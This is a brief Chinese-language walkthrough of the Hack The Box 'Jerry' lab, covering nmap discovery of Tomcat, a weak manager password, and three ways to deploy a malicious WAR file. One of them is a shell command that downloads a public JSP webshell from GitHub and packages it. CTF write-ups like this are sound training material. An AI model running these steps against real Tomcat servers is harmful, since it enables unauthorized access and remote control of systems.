HTB-Jerry

easy box.

首先nmap开路：

找到8080端口：

Tomcat字典：
https://raw.githubusercontent…
找到弱口令tomcat:s3cret

部署war包：
方法1：
官方walkthrough上的：

#!/bin/sh wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp mkdir wshell cp index.jsp wshell/ cd wshell jar -cvf ../wshell.war 

部署wshell:

路径比较深

拿到flag

方法2：
msf使用multi/http/tomcat_mgr_upload

方法3：
msfvenom生成war包

上传war包后nc:

[温馨提示：高防服务器能助您降低 IT 成本，提升运维效率，使您更专注于核心业务创新。]

[图文来源于网络，不代表本站立场，如有侵权，请联系高防服务器网删除]